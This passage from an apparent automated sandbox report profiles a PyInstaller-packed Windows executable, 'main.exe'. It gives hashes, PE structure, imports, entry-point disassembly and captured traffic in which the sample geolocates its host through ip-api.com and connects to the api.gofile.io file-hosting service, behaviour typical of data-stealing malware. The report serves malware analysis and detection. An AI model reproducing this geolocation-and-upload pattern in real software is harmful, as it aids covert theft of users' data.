                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):78
                                                                                                                                                                                                                                                      Entropy (8bit):4.748050898372057
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Cya3ZBFReNmI4S2UUAuF5QEyn:Cy8NMmI4S2UP3
                                                                                                                                                                                                                                                      MD5:35BAF49DEC3F142ACFB8122339BB9F06
                                                                                                                                                                                                                                                      SHA1:9CC003CBD0F17F51B23955E37FCC0ACF3F68D61C
                                                                                                                                                                                                                                                      SHA-256:9FCA86D0C7DC12245B53B244D84CB0B8FCF27880E9981B7024C82B41EFD63E71
                                                                                                                                                                                                                                                      SHA-512:6672B9127DE5AB7BC7FE19CB9DAF1D4629653451E1C8A9AADAD1920CDE97A820D1188C39C5C3B8C12F4828A76C8C2A331EAAB03FB5CD877FC124306EDC9A2DDA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[PYI-7084:ERROR] Failed to execute script 'main' due to unhandled exception!..
                                                                                                                                                                                                                                                      File type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):7.996969631369594
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win64 Executable Console (202006/5) 92.65%
                                                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:main.exe
                                                                                                                                                                                                                                                      File size:27'577'634 bytes
                                                                                                                                                                                                                                                      MD5:c0e4c8f676e781c9dd3d57ffa4f99111
                                                                                                                                                                                                                                                      SHA1:94a6f60949f38da538b5227722698dd880961bb2
                                                                                                                                                                                                                                                      SHA256:9c08a9aca45b1a4e36e0dc907eebead439bff5b2048b1f2248afa4f88520812d
                                                                                                                                                                                                                                                      SHA512:c72e37577c7c1b87404c437431db1a8e72fdb44d402d054556d7d7fb054f5504ae1302a9e7cd20621b84f9b9cc90196ea4a04668a5c8e254cb2d2ca5fae35a69
                                                                                                                                                                                                                                                      SSDEEP:786432:59Yi93OVl8ZFrwq3ObRq2Gm1QtI+1zYCuA188yytDg/K+m5p:59zJB3CRpGiiI+fZXyytD5l
                                                                                                                                                                                                                                                      TLSH:13573366D27108A6EAF5523E832BC25DFA10ED159BA8D54A93E00E076F5B2D0CD3CF47
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......xh.B<...<...<...wq..;...wq......wq..6...,.W.>...,...5...,...-...,.......wq..;...<.......w...%...w...=...Rich<...........PE..d..
                                                                                                                                                                                                                                                      Icon Hash:2e1e7c4c4c61e979
                                                                                                                                                                                                                                                      Entrypoint:0x14000c380
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x67672483 [Sat Dec 21 20:26:43 2024 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:6
                                                                                                                                                                                                                                                      OS Version Minor:0
                                                                                                                                                                                                                                                      File Version Major:6
                                                                                                                                                                                                                                                      File Version Minor:0
                                                                                                                                                                                                                                                      Subsystem Version Major:6
                                                                                                                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                                                                                                                      Import Hash:a06f302f71edd380da3d5bf4a6d94ebd
                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                                      call 00007F7980EB5E6Ch
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                                      jmp 00007F7980EB5A7Fh
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                                      call 00007F7980EB61F8h
                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                      je 00007F7980EB5C33h
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                      jmp 00007F7980EB5C17h
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      cmp ecx, eax
                                                                                                                                                                                                                                                      je 00007F7980EB5C26h
                                                                                                                                                                                                                                                      xor eax, eax
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      cmpxchg dword ptr [000381ACh], ecx
                                                                                                                                                                                                                                                      jne 00007F7980EB5C00h
                                                                                                                                                                                                                                                      xor al, al
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      mov al, 01h
                                                                                                                                                                                                                                                      jmp 00007F7980EB5C09h
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                                      test ecx, ecx
                                                                                                                                                                                                                                                      jne 00007F7980EB5C19h
                                                                                                                                                                                                                                                      mov byte ptr [00038195h], 00000001h
                                                                                                                                                                                                                                                      call 00007F7980EB5355h
                                                                                                                                                                                                                                                      call 00007F7980EB6610h
                                                                                                                                                                                                                                                      test al, al
                                                                                                                                                                                                                                                      jne 00007F7980EB5C16h
                                                                                                                                                                                                                                                      xor al, al
                                                                                                                                                                                                                                                      jmp 00007F7980EB5C26h
                                                                                                                                                                                                                                                      call 00007F7980EC4B1Fh
                                                                                                                                                                                                                                                      test al, al
                                                                                                                                                                                                                                                      jne 00007F7980EB5C1Bh
                                                                                                                                                                                                                                                      xor ecx, ecx
                                                                                                                                                                                                                                                      call 00007F7980EB6620h
                                                                                                                                                                                                                                                      jmp 00007F7980EB5BFCh
                                                                                                                                                                                                                                                      mov al, 01h
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      inc eax
                                                                                                                                                                                                                                                      push ebx
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 20h
                                                                                                                                                                                                                                                      cmp byte ptr [0003815Ch], 00000000h
                                                                                                                                                                                                                                                      mov ebx, ecx
                                                                                                                                                                                                                                                      jne 00007F7980EB5C79h
                                                                                                                                                                                                                                                      cmp ecx, 01h
                                                                                                                                                                                                                                                      jnbe 00007F7980EB5C7Ch
                                                                                                                                                                                                                                                      call 00007F7980EB616Eh
                                                                                                                                                                                                                                                      test eax, eax
                                                                                                                                                                                                                                                      je 00007F7980EB5C3Ah
                                                                                                                                                                                                                                                      test ebx, ebx
                                                                                                                                                                                                                                                      jne 00007F7980EB5C36h
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      lea ecx, dword ptr [00038146h]
                                                                                                                                                                                                                                                      call 00007F7980EC4912h
                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3e9ec0x50.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x490000xef8c.rsrc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x460000x22bc.pdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x580000x768.reloc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3bfb00x1c.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3be700x140.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x2d0000x400.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                      .text0x10000x2b1700x2b200420661550c659f884db561712e500aaeFalse0.5455615942028985data6.498595774489571IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .rdata0x2d0000x128020x12a00b8a8224d719ff42417f9651a57587042False0.5229262793624161data5.768424648089835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .data0x400000x54080xe00aff56347f897785154c53727472c548dFalse0.13504464285714285data1.8315705466577277IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      .pdata0x460000x22bc0x24002411a276649fc67a0a93227155911735False0.4740668402777778data5.334571311334213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .rsrc0x490000xef8c0xf0005d72e0338b034862f777c781ab7d2219False0.8010091145833333data7.3501462320035476IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .reloc0x580000x7680x80042d6242177dbae8e11ed5d64b87d0d48False0.5576171875data5.268722219019965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                      RT_ICON0x492080xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.56636460554371
                                                                                                                                                                                                                                                      RT_ICON0x4a0b00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.7287906137184116
                                                                                                                                                                                                                                                      RT_ICON0x4a9580x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.7471098265895953
                                                                                                                                                                                                                                                      RT_ICON0x4aec00x909bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9971636186822983
                                                                                                                                                                                                                                                      RT_ICON0x53f5c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.38309128630705397
                                                                                                                                                                                                                                                      RT_ICON0x565040x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4826454033771107
                                                                                                                                                                                                                                                      RT_ICON0x575ac0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.699468085106383
                                                                                                                                                                                                                                                      RT_GROUP_ICON0x57a140x68data0.7019230769230769
                                                                                                                                                                                                                                                      RT_MANIFEST0x57a7c0x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                                                      USER32.dllTranslateMessage, ShutdownBlockReasonCreate, GetWindowThreadProcessId, SetWindowLongPtrW, GetWindowLongPtrW, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, CreateWindowExW, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, GetMessageW
                                                                                                                                                                                                                                                      KERNEL32.dllGetTimeZoneInformation, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, GetStringTypeW, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, CreateDirectoryW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, HeapSize, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, GetCurrentProcessId, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, GetConsoleWindow, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, GetFileAttributesExW, HeapReAlloc, WriteConsoleW, SetEndOfFile, GetDriveTypeW, IsDebuggerPresent, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetModuleHandleW, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, GetCommandLineA, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetCurrentDirectoryW, FlushFileBuffers, SetEnvironmentVariableW
                                                                                                                                                                                                                                                      ADVAPI32.dllConvertSidToStringSidW, GetTokenInformation, OpenProcessToken, ConvertStringSecurityDescriptorToSecurityDescriptorW
                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:17.464565992 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:17.464605093 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:17.464699984 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:17.465495110 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:17.465512991 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:18.848165989 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:18.848850965 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:18.848875999 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:18.850831032 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:18.850912094 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:18.852713108 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:18.852799892 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:18.852904081 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:18.852911949 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:18.906724930 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:19.350964069 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:19.351047993 CET4434973145.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:19.351099014 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:19.351799965 CET49731443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:21.632339954 CET4973280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:21.758539915 CET8049732208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:21.758626938 CET4973280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:21.758725882 CET4973280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:21.879117966 CET8049732208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:22.922743082 CET8049732208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:22.923604012 CET4973280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:22.925860882 CET4973380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:23.043518066 CET8049732208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:23.043579102 CET4973280192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:23.045562029 CET8049733208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:23.045636892 CET4973380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:23.045734882 CET4973380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:23.165451050 CET8049733208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:24.198999882 CET8049733208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:24.199827909 CET4973380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:24.320425034 CET8049733208.95.112.1192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:24.320477962 CET4973380192.168.2.4208.95.112.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:25.144341946 CET49735443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:25.144397020 CET4434973545.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:25.144474030 CET49735443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:25.172483921 CET49735443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:25.172507048 CET4434973545.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:26.563395023 CET4434973545.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:26.563869953 CET49735443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:26.563880920 CET4434973545.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:26.565764904 CET4434973545.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:26.565887928 CET49735443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:26.567001104 CET49735443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:26.567162037 CET4434973545.112.123.126192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:26.567199945 CET49735443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:26.567224026 CET49735443192.168.2.445.112.123.126
                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:17.316370964 CET5763253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:17.461277962 CET53576321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:21.479024887 CET6039353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:21.624078035 CET53603931.1.1.1192.168.2.4
                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:17.316370964 CET192.168.2.41.1.1.10x7661Standard query (0)api.gofile.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:21.479024887 CET192.168.2.41.1.1.10x6298Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:17.461277962 CET1.1.1.1192.168.2.40x7661No error (0)api.gofile.io45.112.123.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:21.624078035 CET1.1.1.1192.168.2.40x6298No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                      • api.gofile.io
                                                                                                                                                                                                                                                      • ip-api.com
                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      0192.168.2.449732208.95.112.1807084C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:21.758725882 CET156OUTGET /json/ HTTP/1.1
                                                                                                                                                                                                                                                      Host: ip-api.com
                                                                                                                                                                                                                                                      User-Agent: python-requests/2.32.3
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:22.922743082 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:43:22 GMT
                                                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                      Content-Length: 306
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      X-Ttl: 60
                                                                                                                                                                                                                                                      X-Rl: 44
                                                                                                                                                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                      Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      1192.168.2.449733208.95.112.1807084C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:23.045734882 CET182OUTGET /json/8.46.123.189?fields=192511 HTTP/1.1
                                                                                                                                                                                                                                                      Host: ip-api.com
                                                                                                                                                                                                                                                      User-Agent: python-requests/2.32.3
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Dec 21, 2024 21:43:24.198999882 CET497INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 21 Dec 2024 20:43:23 GMT
                                                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                      Content-Length: 320
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                      X-Ttl: 60
                                                                                                                                                                                                                                                      X-Rl: 44
                                                                                                                                                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
